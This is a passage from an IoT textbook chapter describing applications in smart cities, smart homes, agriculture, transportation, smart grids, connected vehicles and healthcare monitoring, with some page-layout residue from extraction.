12.2.11. Monitoring User Satisfaction

User feedback is essential to improve public services and increase satisfaction.


It’s even better when you can get that feedback in real time immediately after
the experience.

Install a small, customizable, connected dashboard or button to collect user


feedback effortlessly, using color codes to trigger instant responses as guests
leave public service buildings. The data is then available in the cloud for

5
Application
Development, visualization and real-time satisfaction insights. Alerts based on specific
Fog Computing and
Case Studies thresholds or results can also be triggered for a faster response.

12.2.12. Improved Data Collection for Better Air Quality Monitoring

Various sensors are easy to install and so cheap to run that an entire city can be
covered, enabling dozens of metrics to be tracked such as humidity,
temperature, air quality and more. Some cities have installed sensors on
moving locations such as trams and buses to collect even more data throughout
the day. With increased availability of data, it’s easy to build interactive, real-
time mapping of air pollution and improve pollution prediction through
Machine Learning.

12.2.13. Optimized Refuse Collection Routes with Connected Dumpsters

Collection routes can be optimized to save time, energy and money with low-
power connected ultrasonic sensors that indicate the level of waste in
dumpsters. The sensors also provide valuable data about dumpster usage,
emptying cycles and more. This can consolidate routes to save time, energy,
and money.

12.2.14. Collecting Consumption Data Effortlessly

Put an end to manual on-site meter readings and data processing of water, gas
and electricity consumption. You can now monitor and optimize your remote
assets in real-time, detecting issues such as leaks and breakdowns. Service
companies can also automate billing and remotely activate and deactivate
services. IoT-enabled meters can transmit data immediately over the public
network with no pairing or configuration required and no need to replace or
recharge batteries for years.

12.2.15. Fire Hydrants – Monitoring Potential Issues in Real-time

With IoT enabled pressure sensors, get real-time alerts when fire hydrants are
in use and also may know how much water is consumed. Install an
accelerometer sensor to send alerts instantly if a hydrant is broken, leaking or
malfunctioning. Install a temperature monitor to help prevent cold weather
damage in inclement and wintery conditions.

12.216. Checking Soil Moisture

Soil condition monitoring can be done remotely and cost efficiently to help
minimize plant stress caused by dehydration. Besides reducing the cost of
replacing plants, these solutions also optimize water usage.

12.2.17. Monitoring and Maintaining Street Lighting Networks Remotely

With the IoT enabled sensors, maintenance operations like detecting


overheating, power supply shortage and broken bulbs is possible. Deploy
workers only when necessary instead of carrying out routine maintenance
6
IoT Case Studies
checks. Install IoT-enabled light intensity sensors to remotely control light
intensity for energy savings.

Some of the applications are discussed in detail in the next sections.

12.3 SMART HOMES


It’s a fully connected household environment that provides its residents with an
unprecedented level of control and comfort. The main purpose of smart home
IOT devices is to simplify your home life, make it safer and more convenient.
In 2021, the concept of smart home automation implies much more than just
remote control and automation. IoT, along with emerging technologies like AI,
has opened up possibilities in home automation.

Today, a smart home lives to exceed consumer’s expectations. It learns about


your habits, your favorite music, room temperature, wake up timings and
determine consumption patterns. These insights help provide a personalized
experience at your homes. They can be easily controlled via a smartphone app,
so we don’t have to worry about our home security even when we are not
there.

Let’s look at the most popular ways to use Smart Home IoT technologies and
understand what the benefits look like.

12.3.1 Smart Lighting

Today, the most widely used smart home application is home lighting. Most
people know of tunable lighting that can change between warm and bright with
different colour hues that suit your mood & requirement.
But let’s check a few other use case scenarios for smart lights.

 As you enter your home, lights can turn on automatically without the
necessity to press a button. This can also work as a safety feature to
detect intrusions.

 The opposite is also possible as you leave your home; the system can
turn the lights off automatically, thereby saving energy.

 Home theatre enthusiasts can have the lights programmed to


automatically dim while watching a movie to provide the best viewing
experience.

 Your light can turn on when your alarm rings in the morning, waking
the whole household up if need be.

 All smart lighting in your home can be connected to your smartphone


and other connected devices and can be voice-controlled.

7
Application
Development,
Fog Computing and
Case Studies

12.3.2 Smart Kitchen

Smart home automation devices can make the cooking process safer and
convenient too.

 It can turn on the lights or play soothing music when you enter the
kitchen.

 Smart sensors can check for gas leaks, smokes, water leakages and turn
off the power in the house if the indicators are outside the optimum
range.

 Appliances like refrigerators, chimneys etc., can be controlled through


voice-activated devices.

12.3.3 Smart Safety and Security Systems

Safety sensors identify anything wrong at your home. They can notify home
users of any overlooked like an appliance left on or any potential threats
immediately and even trigger necessary action to prevent them.

 Proximity, motion and video sensors can identify if a burglar makes an


attempt to break into your home and automatically turn on the panic
alarm, lights and call the police.

 Smart home users can check their home state remotely through the app
on their phones and control pretty much everything at home.

 While locking the door, you can set controllers to automatically close
the curtains, turn off devices and ensure your home is protected against
any trespassers.

 You can monitor your elderly relatives and automate things remotely
for them if needed.

12.3.4 Smart Bathrooms

Smart home IoT technologies in the bathroom can help in power and energy
savings with convenience.

 With smart home automation, you can set your geysers to automatically
turn on and off at a pre-set pattern basis your shower routine.

 This also helps make your home energy efficient by eliminating the
unnecessary functioning of high power-consuming home appliances
like geysers, heaters, ACs.

8
IoT Case Studies

12.3.5 Smart Gardens

A smart home can be exceptionally beneficial for those plant lovers interested
in growing vegetables, fruit, herbs, and indoor plants at home.

 The technology allows users to check if the plant is adequately


hydrated and receiving the necessary amount of sunlight.

 You can monitor your plant and turn on your smart irrigation system
when needed. You can control and stop the watering system, thus
optimizing water usage

 Smart home IoT technology has led to a real breakthrough in


gardening, which will completely remodel the traditional approach to
growing plants.

12.3.6 Smart Temperature Control

With temperature control automation, you can optimize your ACs to provide
the best experience while being energy efficient.

 For instance, users can turn on their bedroom ACs as they drive from
the office to enjoy a cool room once home after a tiring day.

 You can configure the bedroom AC with your geyser times, so once
you step out from your bath, the room is ready for you.

 You can set the ACs to function based on the room temperature while
you sleep at night. So you are neither cold nor hot and get a good
night’s sleep.

12.3.7 Smart Doors

We can safely assume the doors of our future will not need keys. Digital locks
are safe and can be set to initiate a sequence of other devices in your home.

 For instance, a door open can follow a customized sequence of actions


like the light switching on; inside doors unlocked, and music and ACs
are turned on.

 The entry door digital lock can identify who opened the door when.
With a custom entry assigned for each individual, you can know when
your kids, your hubby, or your maid reached home through
notifications on your smartphones.

9
Application
Development, Till now the IoT has disrupted many industries and the Agriculture Industry
Fog Computing and
Case Studies isn’t an exception. In the following section let us study smart agriculture
applications using IoT.

12.4 APPLICATIONS OF IoT IN AGRICULTURE

Throughout the world, mechanical innovations such as tractors and harvesters


took place and brought into the agriculture operations in the late 20th century.
And the agriculture Industry relies heavily on innovative ideas because of the
steadily growing demand for food.

The Industrial IoT(IIoT) has been a driving force behind increased agricultural
production at a lower cost. In the next several years, the use of smart solutions
powered by IoT will increase in the agriculture operations. In fact, few of the
recent report tells that the IoT device installation will see a compound annual
growth rate of 20% in the agriculture industry. And the number of connected
devices (agricultural) will grow from 13 million in 2014 to 225 million by
2024.

The IoT in Agriculture has come up as a second wave of green revolution. The
benefits that the farmers are getting by adapting IoT are twofold. It has helped
farmers to decrease their costs and increase yields at the same time by
improving farmer's decision making with accurate data.

Smart Farming is a hi-tech and effective system of doing agriculture and


growing food in a sustainable way. It is an application of implementing
connected devices and innovative technologies together into agriculture. Smart
Farming majorly depends on IoT thus eliminating the need of physical work of
farmers and growers and thus increasing the productivity in every possible
manner.

With the recent agriculture trends dependent on agriculture, IoT has brought
huge benefits like efficient use of water, optimization of inputs and many
more. What made difference were the huge benefits and which has become a
revolutionized agriculture in the recent days.

IoT based Smart Farming improves the entire Agriculture system by


monitoring the field in real-time. With the help of sensors and
interconnectivity, the IoT in Agriculture has not only saved the time of the
farmers but has also reduced the extravagant use of resources such as Water
and Electricity. It keeps various factors like humidity, temperature, soil etc.
under check and gives a crystal clear real-time observation.
10
IoT Case Studies

Following are some of the benefits of adopting IoT in Agriculture:

12.4.1 Real-Time Weather Conditions

Climate plays a very critical role for farming. And having improper knowledge
about climate heavily deteriorates the quantity and quality of the crop
production. But IoT solutions enable you to know the real-time weather
conditions. Sensors are placed inside and outside of the agriculture fields. They
collect data from the environment which is used to choose the right crops
which can grow and sustain in the particular climatic conditions. The whole
IoT ecosystem is made up of sensors that can detect real-time weather
conditions like humidity, rainfall, temperature and more very accurately. There
are numerous no. of sensors available to detect all these parameters and
configure accordingly to suit your smart farming requirements. These sensors
monitor the condition of the crops and the weather surrounding them. If any
disturbing weather conditions are found, then an alert is sent.

12.4.2 Precision Farming

Precision Farming is one of the most famous applications of IoT in


Agriculture. It makes the farming practice more precise and controlled by
realizing smart farming applications such as livestock monitoring, vehicle
tracking, field observation, and inventory monitoring. The goal of precision
farming is to analyze the data, generated via sensors, to react accordingly.
Precision Farming helps farmers to generate data with the help of sensors and
analyze that information to take intelligent and quick decisions. There are
numerous precision farming techniques like irrigation management, livestock
management, vehicle tracking and many more which play a vital role in
increasing the efficiency and effectiveness. With the help of Precision farming,
you can analyze soil conditions and other related parameters to increase the
operational efficiency. Furthermore, you can also detect the real-time working
conditions of the connected devices to detect water and nutrient level.

12.4.3 Smart Greenhouse

To make our greenhouses smart, IoT has enabled weather stations to


automatically adjust the climate conditions according to a particular set of
instructions. Adoption of IoT in Greenhouses has eliminated the human

11
Application
Development,
Fog Computing and
intervention, thus making entire process cost-effective and increasing accuracy
Case Studies at the same time. For example, using solar-powered IoT sensors builds modern
and inexpensive greenhouses. These sensors collect and transmit the real-time
data which helps in monitoring the greenhouse state very precisely in real-
time. With the help of the sensors, the water consumption and greenhouse state
can be monitored via emails or SMS alerts. Automatic and smart irrigation is
carried out with the help of IoT. These sensors help to provide information on
the pressure, humidity, temperature and light levels.

12.4.4 Use of Drones

Technological advancements has almost revolutionized the agricultural


operations and the introduction of agricultural drones is the trending
disruption. The Ground and Aerial drones are used for assessment of crop
health, crop monitoring, planting, crop spraying, and field analysis. With
proper strategy and planning based on real-time data, drone technology has
given a high rise and makeover to the agriculture industry.

Drones with thermal or multispectral sensors identify the areas that require
changes in irrigation. Once the crops start growing, sensors indicate their
health and calculate their vegetation index. Eventually smart drones have
reduced the environmental impact. The results have been such that there has
been a massive reduction and much lower chemical reaching the groundwater.

12.4.5 Data Analytics

The conventional database system does not have enough storage for the data
collected from the IoT sensors. Cloud based data storage and an end-to-end
IoT Platform plays an important role in the smart agriculture system. These
systems are estimated to play an important role such that better activities can
be performed. In the IoT world, sensors are the primary source of collecting
data on a large scale. The data is analyzed and transformed to meaningful
information using analytics tools.

The data analytics helps in the analysis of weather conditions, livestock


conditions, and crop conditions. The data collected leverages the technological
innovations and thus making better decisions. With the help of the IoT devices,
you can know the real-time status of the crops by capturing the data from
sensors. Using predictive analytics, you can get an insight to make better
decisions related to harvesting. The trend analysis helps the farmers to know
upcoming weather conditions and harvesting of crops. IoT in the Agriculture
Industry has helped the farmers to maintain the quality of crops and fertility of
the land, thus enhancing the product volume and quality.

12
IoT Case Studies
In the next section let us study the use of IoT in another important sector i.e.,
Transportation.

12.5 SMART TRANSPORTATION

The utilization of IoT in the transportation industry has gained momentum in


recent times. Within the transportation sector, IoT devices are deployed for a
wide range of applications to provide efficient and secure transport in urban
areas, notably in ticketing, security, surveillance and telematics systems.

IoT in transportation incorporates a wide network of embedded sensors,


actuators, smart objects and other intelligent devices. This network collects
data about the real-world scenario and transmits it over the specialized
software to transform that data into useful information. The operations of the
transport sector have been revolutionized with the help of IoT enabled
technologies and smart solutions. Furthermore, the transportation system in the
urban areas is becoming more complex day by day as the vehicle population on
the road is increasing. This highlights the need of the municipalities to
integrate IoT in transportation to have access to greater and secure
transportation benefits.

Considering the importance of secure and advanced transportation, this section


discusses IoT’s important and common applications that are revolutionizing
the current transport sector.

12.5.1 Efficient Traffic Management

Traffic management is the biggest segment within the transportation industry


where the adoption of IoT technologies is observed to be the most prominent.
Million and Billions of Gigabytes of traffic and vehicle-related data are being
generated through CCTV cameras. This data is transferred to traffic
management centers for keeping a closer look at the vehicles and punishing the
car owners who are violating the traffic rules and regulations. Smart parking,
automatic traffic light system and smart accident assistance are the few
applications of IoT that help the traffic and patrolling officers in managing the
traffic efficiently and reducing the risk of accidents.

12.5.2 Automated Toll and Ticketing

13
Application
Development,
Fog Computing and
The traditional tolling and ticketing systems are not only becoming outdated
Case Studies but they are also not proving to be effective for assisting the current flow of
vehicles on the road. With the increased number of vehicles on the road, the
toll booths have become busy and crowded as well on the highways and the
drivers have to spend a lot of time waiting for their turn. The toll booths do not
have enough resources and manpower to immediately assist many vehicles.
Compared to traditional tolling and ticketing systems, IoT in transportation
offers automated tolls. With the help of RFID tags and other smart sensors,
managing toll and ticketing have become much easier for traffic police
officers.

The majority of advanced vehicles nowadays have IoT connectivity. Any


vehicle which might be a kilometer away from the tolling station can easily be
detected with the help of IoT technologies. This enables the lifting of the
traffic barriers for the vehicles to pass through. However, the older vehicles do
not have IoT connectivity, but the smartphones of the car owners can serve the
same purpose as well, that is, taking automatic payments through phones
linked to the digital wallet. This indicates that IoT in transportation is much
more flexible and is compatible with new vehicles and demonstrate easy
integration with older vehicles as well, for automated toll and ticketing
procedures.

12.5.3 Self-driving Cars

Self-driving cars or autonomous vehicles are the coolest things that have been
introduced in the transportation industry. In the past decades, the concept of
self-driving cars was just like a dream, but this has been turned into an
innovative reality with the support of IoT technologies. Self-driving cars are
capable of moving safely by sensing the environment, with little or no human
interaction. However, to gather data about the surrounding, self-driving cars
use a wide range of sensors. For instance, the self-driving car uses acoustic
sensors, ultrasonic sensors, radar, LiDAR (Light detection and ranging),
camera and GPS sensors to have information about the surroundings and take
the data-driven decision about mobility accordingly. This indicates that the
functioning of self-driving cars is dependent on IoT sensors. With the help of
IoT, sensors equipped in the self-driving cars continuously gather the data
about the surrounding in real-time and transfer this data either to a central unit
or cloud. The system analyzes the data in a fraction of seconds, enabling the
self-driving cars to perform as per the information provided. This indicates that
IoT connects the sensor network for self-driving cars and enables them to
function in the desired manner.

12.5.4 Advanced Vehicle Tracking or Transportation Monitoring

14
IoT Case Studies
Vehicle tracking or transportation monitoring systems have become the need
of many businesses to manage their fleets and supply chain processes
effectively. With the help of GPS trackers, transportation companies have
smooth access to real-time location, facts and figures about the vehicle. This
enables the transportation companies to monitor their important assets in real-
time. Apart from location monitoring, IoT devices can also monitor the
driver’s behavior and can inform about the driving style and idling time. In
fleet management systems, IoT has minimized the operating and fuel
expenditures along with the cost of maintenance. As far as transportation
monitoring is concerned, then it can be said that real-time tracking has made
the implementation of smart decisions much easier, enabling the drivers to
identify the issues in the vehicle immediately and take precautions where
necessary.

12.5.5 Enhanced Security of the Public Transport

One of the key areas in which the IoT in transportation is found to be the most
useful is focused on the security of public transport. By keeping an eye on
every transport with the help of IoT devices, municipalities can track traffic
violations and take appropriate actions. Apart from security, IoT in
transportation also complements public transport management by providing a
wide range of smart solutions. This includes advanced vehicle logistic
solutions, passenger information systems, automated fare collection and
integrated ticketing. These solutions help in managing public transport and
traffic congestion. Real-time management of public transport has become
possible with IoT. This has facilitated the transportation agencies to establish
better communication with the passengers and provide necessary information
through passenger information displays and mobile devices. IoT has
undoubtedly made public transport more secure and efficient

In the next section let us focus on Smart Grids.

12.6 SMART GRIDS

15
Application
Development,
Fog Computing and
The Internet of Things (IoT) has the power to reshape the way we think about
Case Studies cities across the world. IoT connects people and governments to smart
city solutions. Connecting and controlling devices has given rise to smart
grdi technology, designed to improve and replace older architecture

Smart grids are electrical grids that involve the same transmission lines,
transformers, and substations as a traditional power grid. What sets them apart
is that Smart Grids involve IoT devices that can communicate with each other
and with the consumers.

Smart grid technology will help tackle the growing demand for renewable
power sources to be integrated into the existing grid, and enable the national
and international vision of low carbon energy. They are designed with energy
efficiency and sustainability in mind. As such, they can measure power
transmission in real-time, automate management processes, reduce power cuts,
and easily integrate various renewable energy sources.

The smart grid must be considered as a mission-critical asset that is part of an


IoT framework. It can be used to remotely monitor and manage:

 Street lighting
 Transmission lines
 Substations
 Cogeneration
 Outage sensors
 Early detection (e.g., power disturbances due to earthquakes and
extreme weather)

The smart grid does this through private, dedicated networks connecting
devices that are distributed to businesses and homes citywide, including:

 Smart meters
 Data concentrators
 Transformers
 Sensors

Smart grid IoT technologies contribute to robust and efficient energy


management solutions lacking in the existing framework. The IoT smart grid
enables two-way communication between connected devices and hardware that
sense and respond to user demands. A smart grid is more resilient and less
costly than the current power infrastructure.

12.6.1 Key Features of Smart Grid

Following are the key features of the Smart Grid:


16
IoT Case Studies
Load Handling: The load that a power grid needs to supply towards is every-
changing. Smart grids can help advise consumers to change their usage
patterns during times of heavy load.

Demand Response Support: Smart grids can help consumers reduce their
electricity bills by advising them to use devices with a lower priority when the
electrical rates are lower. This also helps in the real-time analysis of electrical
usage and charges.

Decentralization of Power Generation: Smart grids help decentralize power


grids since they can easily help incorporate renewable energy sources such as
solar panels at an individual scale and discretion.

12.6.2 Benefits of Smart Grid

Current power grids aren’t made to withstand the immense draw on resources
and the need to transmit data for billions of consumers worldwide. The smart
grid can:

 Detect energy spikes and equipment failure


 Prevent power outages
 Route power to those in need more quickly

Once fully integrated, smart grid technologies can change the way we work
and interact with the world.

Here are some benefits of transitioning to IoT-enabled smart grid technology:

12.6.2.1 Smarter Energy Use

Smart grid technologies will help to reduce energy consumption and costs
through usage and data maintenance. Intelligent lighting through smart city
technology will be able to:

 Monitor usage across various areas


 Immediately adapt to settings like rain or fog
 Adjust output to meet the time of day or traffic conditions
 Detect and address lighting outages instantly

For consumer applications, users can adjust the temperature of their home
thermostats through apps while at work or on vacation.

12.6.2.2 Cleaner Energy Use

17
Application
Development,
Fog Computing and
Smart grid technologies are less demanding on batteries and more carbon
Case Studies efficient. They are designed to reduce the peak load on distribution feeders. For
example, the U.S. Department of Energy is integrating green technology into
their IoT smart management for more sustainable solutions. These solutions
have the potential to benefit all distribution chains and include:

 Optimized wind turbines


 Solar cells
 Microgrid technologies
 Feeder automation systems

12.6.2.3 Lower Costs

As the world’s population continues to grow, the older grids won’t keep up
with the increasing demands. Smart grids are designed to lower long-term
costs through smart energy IoT monitoring and source rerouting for fast
recovery when a power failure is detected.

12.6.2.4 Improved Transportation and Parking

As more electric vehicles enter operation, IoT smart sensors can collect real-
time data to relay information to drivers and authorities. Accessing this data
from smart sensors will enable cities to:

 Reduce traffic congestion


 Provide better parking solutions
 Alert drivers to traffic incidents and structural damage to city
landscapes
 Allow for automatic payments at road tolls and parking meters

IoT technology is also at the core of expanding electric charging stations that
heavily tax the power grid.

12.6.2.5 Help with Waste and Water Management

Water treatment and distribution and wastewater processing are significant


drains on the energy grid. Smart cities improve efficiency and reduce costs in
their waste and water management solutions. IoT applications can provide real-
time data to track inventory and reduce theft and loss. Smart energy analytics
can gather data on water flow, pressure and temperature to help consumers
track usage habits. Timers and infrastructure modules can regulate usage and
reduce waste.

12.6.2.6 Energy Enablement in Developing Countries

18
IoT Case Studies
The IEA report discusses how smart grids can provide rural areas with
electricity by transitioning to community grids that connect to regional and
national grids. These grids will be critical for deploying new power
infrastructures in developing countries experiencing population overflow
impacts. Starting with new technology ensures the best path to economic
growth.

12.6.2.7 Greater Insight into Regional Issues

Optimized smart city solutions mean greater insight into regional issues.
Imagine a smart grid set up to respond to a regional drought or wildfires in a
dry area. Adaptive city fog lighting would be suitable for some cities.
Customized technology and better data collection can improve the daily lives
of countless regional populations.

12.7 CONNECTED VEHICLES

Connected cars have become the new norm in the automobile industry, and we
can only expect it to get better and better. In the following section, let us read
on to know more about connected vehicles, connected car features and the
future of connected car technology.

12.7.1 Connected Cars

Any car which can connect to the Internet is called a Connected Car. Usually,
such vehicles connect to the internet via WLAN (Wireless Local Area
Network). A connected vehicle can also share the Internet with devices inside
and outside the car, and at the same time can also share data with any external
device/services. Connected vehicles can always access the internet to perform
functions/download data when requested by the user.

12.7.2 How does Connected Car Technology Work?

Any vehicle which is equipped with internet connectivity can be called a


connected car. Currently, automobile companies use two kinds of systems in
connected cars: Embedded and Tethered systems. An Embedded vehicle will
be equipped with a chipset and built-in antenna, and a Tethered system will be
equipped with hardware that connects to the driver’s smartphone. A connected
vehicle can access/send data, download software updates/patches, connect with
other devices (Internet Of Things or IoT) and also provide WiFi internet
connection to the passengers. The connected car telematics can also be
accessed through connected technology, and it is extremely useful for electric
vehicles.

12.7.3 Features of Connected Cars

19
Application
Development, A connected vehicle comes equipped with a host of smart and convenient
Fog Computing and
Case Studies features. The features of connected car technology improve the overall driving
and ownership experience, and also add safety net with its advanced security
features. Below are the smart features of a connected vehicle:

Internet Connectivity in Cars: A connected car is always connected to the


internet via an embedded chipset or SIM card, and it can access the internet,
provided there is stable wireless network coverage. Connected vehicles can
also provide onboard WiFi connectivity, download over-the-air updates
released by the manufacturer and access other online apps and services.

App to Car Connectivity: Nowadays, car manufacturers provide a dedicated


smartphone app that connects with the vehicle through the wireless network.
The app allows users to remotely operate the functions of a car such as
locking/unlocking the door, opening sunroof, engine start/stop, climate control,
headlight on/off and honk the horn. The app will also help to locate the car via
the onboard GPS.

Geo-Fencing: The connected vehicles come with an important security


feature known as Geo-Fencing. In simple words, it creates a geographical
boundary on the map and alerts the owner, if the vehicle is driven beyond the
set boundary. The geo-fencing can be set via the smartphone app, and this
feature will be extremely useful if you are worried about the
young/inexperienced drivers taking the car out.

Vehicle to Vehicle Communication (V2V): Vehicle-to-vehicle connectivity


technology allows connected vehicles to communicate with each other. The V-
2-V enables the sharing of vital information such as traffic movement, road
conditions, speed limits and much more. V-2-V technology will be a critical
part of autonomous vehicles, which are deemed as the future of mobility.

Entertainment: A connected vehicle will allow you to connect to a host of


pre-loaded entertainment services/apps. You can listen to music, internet radio
or even watch videos (when the vehicle is parked). Apart from that, you can
also connect your smartphone to the infotainment system of the car via apps
and remotely control the audio/video.

Remote Parking: As the name of the feature suggests, some high-end


connected cars even allow you to remotely park the vehicle. Yes, using the
smartphone app or the smart key fob, you can get out of your vehicle and
manoeuvre the car to park it in the desired spot. This feature will come in
handy in tight parking spaces and when you are not confident about parking
the car in a very congested area.

Security; Connected vehicles come equipped with several critical security


features such as real-time location sharing/tracking, emergency SOS calls in
case of an accident, roadside assistance in case of vehicle breakdown and much

20
IoT Case Studies
more. Apart from the onboard safety equipment, these smart safety features
come in handy during tricky situations.

12.7.4 Types of Connectivity

A connected vehicle uses different types of communication technologies, and


this is where automotive and information technology works hand in hand.
Below are the different types of connectivity technologies:

 Vehicle to Infrastructure (V2I): This type of connectivity is used


mainly for the safety of the vehicle. The vehicle communicates with the
road infrastructure, and shares/receives information such as
traffic/road/weather condition, speed limits, accidents, etc.

 Vehicle to Vehicle (V2V): The vehicle-to-vehicle communication


system allows the real-time exchange of information between vehicles.
V2V is also used for the safety of vehicles.

 Vehicle to Cloud (V2C): The V2C connection is established via the


wireless LTE network, and it relays data with the cloud. Vehicle to
cloud connectivity is mainly used for downloading over-the-air (OTA)
vehicle updates, remote vehicle diagnostics or to connect with any IoT
devices.

 Vehicle to Pedestrian (V2P): One of the newest systems used in


connected vehicles is the V2P system, and it is also for safety purposes.
Vehicles use sensors to detect pedestrians, which gives collision
warnings.

 Vehicle to Everything (V2X): The combination of all the above-


mentioned types of connectivity is known as V2X connectivity.

The connected car technology will not be limited to conventional cars. The
self-driving vehicles will also make use of this technology to communicate
with the road infrastructure and cloud system. But at present, the connected
cars are disrupting the automobile industry. With more and more smart
vehicles being launched, buyers are leaning towards the connected cars. In the
coming years, connected technology will be the new norm, and it will also
enhance safety and reduce accidents.

Healthcare is the major domain which as IoT usage. Let us study Smart
Healthcare in the next section.

12.8 SMART HEALTHCARE

Internet of Things (IoT)-enabled devices have made remote monitoring in the


healthcare sector possible, unleashing the potential to keep patients safe and
healthy, and empowering physicians to deliver superlative care. It has also
21
Application
Development, increased patient engagement and satisfaction as interactions with doctors have
Fog Computing and
Case Studies become easier and more efficient. Furthermore, remote monitoring of patient’s
health helps in reducing the length of hospital stay and prevents re-admissions.
IoT also has a major impact on reducing healthcare costs significantly and
improving treatment outcomes.

IoT is undoubtedly transforming the healthcare industry by redefining the


space of devices and people interaction in delivering healthcare solutions. IoT
has applications in healthcare that benefit patients, physicians, hospitals and
insurance companies.

IoT for Patients

Devices in the form of wearables like fitness bands and other wirelessly
connected devices like blood pressure and heart rate monitoring cuffs,
glucometer etc. give patients access to personalized attention. These devices
can be tuned to remind calorie count, exercise check, appointments, blood
pressure variations and much more.

IoT has changed people’s lives, especially elderly patients, by enabling


constant tracking of health conditions. This has a major impact on people
living alone and their families. On any disturbance or changes in the routine
activities of a person, alert mechanism sends signals to family members and
concerned health providers.

IoT for Physicians

By using wearables and other home monitoring equipment embedded with IoT,
physicians can keep track of patients’ health more effectively. They can track
patients’ adherence to treatment plans or any need for immediate medical
attention. IoT enables healthcare professionals to be more watchful and
connect with the patients proactively. Data collected from IoT devices can help
physicians identify the best treatment process for patients and reach the
expected outcomes.

IoT for Hospitals

Apart from monitoring patients’ health, there are many other areas where IoT
devices are very useful in hospitals. IoT devices tagged with sensors are used
for tracking real time location of medical equipment like wheelchairs,
defibrillators, nebulizers, oxygen pumps and other monitoring equipment.
Deployment of medical staff at different locations can also be analyzed real
time.

The spread of infections is a major concern for patients in hospitals. IoT-


enabled hygiene monitoring devices help in preventing patients from getting
infected. IoT devices also help in asset management like pharmacy inventory

22
IoT Case Studies
control, and environmental monitoring, for instance, checking refrigerator
temperature, and humidity and temperature control.

IoT for Health Insurance Companies

There are numerous opportunities for health insurers with IoT-connected


intelligent devices. Insurance companies can leverage data captured through
health monitoring devices for their underwriting and claims operations. This
data will enable them to detect fraud claims and identify prospects for
underwriting. IoT devices bring transparency between insurers and customers
in the underwriting, pricing, claims handling, and risk assessment processes. In
the light of IoT-captured data-driven decisions in all operation processes,
customers will have adequate visibility into underlying thought behind every
decision made and process outcomes.

Insurers may offer incentives to their customers for using and sharing health
data generated by IoT devices. They can reward customers for using IoT
devices to keep track of their routine activities and adherence to treatment
plans and precautionary health measures. This will help insurers to reduce
claims significantly. IoT devices can also enable insurance companies to
validate claims through the data captured by these devices.

Advantages of Use of IoT in Healthcare

The major advantages of IoT in healthcare include:

 Cost Reduction: IoT enables patient monitoring in real time, thus


significantly cutting down unnecessary visits to doctors, hospital stays
and re-admissions

 Improved Treatment: It enables physicians to make evidence-based


informed decisions and brings absolute transparency

 Faster Disease Diagnosis: Continuous patient monitoring and real


time data helps in diagnosing diseases at an early stage or even before
the disease develops based on symptoms

 Proactive Treatment: Continuous health monitoring opens the doors


for providing proactive medical treatment

 Drugs and Equipment Management: Management of drugs and


medical equipment is a major challenge in a healthcare industry.
Through connected devices, these are managed and utilized efficiently
with reduced costs

 Error Reduction: Data generated through IoT devices not only help in
effective decision making but also ensure smooth healthcare operations
with reduced errors, waste and system costs

Following are some of the wearable devices of IoT in Healthcare:


23
Application
Development, 12.8.1 Healthcare Monitoring Devices
Fog Computing and
Case Studies
IoT devices offer a number of new opportunities for healthcare professionals to
monitor patients, as well as for patients to monitor themselves. By extension,
the variety of wearable IoT devices provides an array of benefits and
challenges, for healthcare providers and their patients alike.

12.8.2 Remote Patient Monitoring

Remote patient monitoring is the most common application of IoT devices for
healthcare. IoT devices can automatically collect health metrics like heart rate,
blood pressure, temperature, and more from patients who are not physically
present in a healthcare facility, eliminating the need for patients to travel to the
providers, or for patients to collect it themselves.

When an IoT device collects patient data, it forwards the data to a software
application where healthcare professionals and/or patients can view it.
Algorithms may be used to analyze the data in order to recommend treatments
or generate alerts. For example, an IoT sensor that detects a patient’s unusually
low heart rate may generate an alert so that healthcare professionals can
intervene.

A major challenge with remote patient monitoring devices is ensuring that the
highly personal data that these IoT devices collect is secure and private.

12.8.3 Glucose Monitoring

Glucose monitoring has traditionally been difficult. Not only is it inconvenient


to have to check glucose levels and manually record results, but doing so
reports a patient’s glucose levels only at the exact time the test is provided. If
levels fluctuate widely, periodic testing may not be sufficient to detect a
problem.

IoT devices can help address these challenges by providing continuous,


automatic monitoring of glucose levels in patients. Glucose monitoring devices
eliminate the need to keep records manually, and they can alert patients when
glucose levels are problematic.

Challenges include designing an IoT device for glucose monitoring that:


a. Is small enough to monitor continuously without causing a disruption to
patients
b. Does not consume so much electricity that it needs to be recharged
frequently.

These are not insurmountable challenges, however, and devices that address
them promise to revolutionize the way patients handle glucose monitoring.

12.8.4 Heart-Rate Monitoring


24
IoT Case Studies
Like glucose, monitoring heart rates can be challenging, even for patients who
are present in healthcare facilities. Periodic heart rate checks don’t guard
against rapid fluctuations in heart rates, and conventional devices for
continuous cardiac monitoring used in hospitals require patients to be attached
to wired machines constantly, impairing their mobility.

Today, a variety of small IoT devices are available for heart rate
monitoring, freeing patients to move around as they like while ensuring that
their hearts are monitored continuously. Guaranteeing ultra-accurate results
remains somewhat of a challenge, but most modern devices can deliver
accuracy rates of about 90 percent or better.

12.8.5 Hand Hygiene Monitoring

Traditionally, there hasn’t been a good way to ensure that providers and
patients inside a healthcare facility washed their hands properly in order to
minimize the risk of spreading contagion.

Today, many hospitals and other health care operations use IoT devices
to remind people to sanitize their hands when they enter hospital rooms. The
devices can even give instructions on how best to sanitize to mitigate a
particular risk for a particular patient.

A major shortcoming is that these devices can only remind people to clean
their hands; they can’t do it for them. Still, research suggests that these devices
can reduce infection rates by more than 60 percent in hospitals.

12.8.6 Depression and Mood Monitoring

Information about depression symptoms and patients’ general mood is another


type of data that has traditionally been difficult to collect continuously.
Healthcare providers might periodically ask patients how they are feeling, but
were unable to anticipate sudden mood swings. And, often, patients don’t
accurately report their feelings.

“Mood-aware” IoT devices can address these challenges. By collecting and


analyzing data such as heart rate and blood pressure, devices can infer
information about a patient’s mental state. Advanced IoT devices for mood
monitoring can even track data such as the movement of a patient’s eyes.

The key challenge here is that metrics like these can’t predict depression
symptoms or other causes for concern with complete accuracy. But neither can
a traditional in-person mental assessment.

12.8.7 Parkinson’s Disease Monitoring

25
Application
Development, In order to treat Parkinson’s patients most effectively, healthcare providers
Fog Computing and
Case Studies must be able to assess how the severity of their symptoms fluctuate through the
day.

IoT sensors promise to make this task much easier by continuously collecting
data about Parkinson’s symptoms. At the same time, the devices give patients
the freedom to go about their lives in their own homes, instead of having to
spend extended periods in a hospital for observation.

12.8.8 Other examples of IoT/IoMT

While wearable devices like those described above remain the most commonly
used type of IoT device in healthcare, there are devices that go beyond
monitoring to actually providing treatment, or even “living” in or on the
patient. Examples include the following.

12.8.8.1 Connected Inhalers

Conditions such as asthma or COPD often involve attacks that come on


suddenly, with little warning. IoT-connected inhalers can help patients by
